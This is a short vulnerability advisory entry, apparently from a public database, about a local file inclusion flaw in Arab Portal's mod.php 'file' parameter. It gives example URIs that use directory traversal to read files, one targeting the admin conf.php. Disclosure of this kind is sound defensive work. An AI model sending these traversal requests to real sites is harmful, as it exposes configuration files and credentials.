• info
• discussion
• exploit
• solution
• references

Arab Portal 'file' Parameter Local File Include Vulnerability

Attackers may exploit this issue through a browser.

The following example URIs are available.

http://www.example.com/[path]/mod.php?mod=html&modfile=show file=..\File.Type

http://www.example.com/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php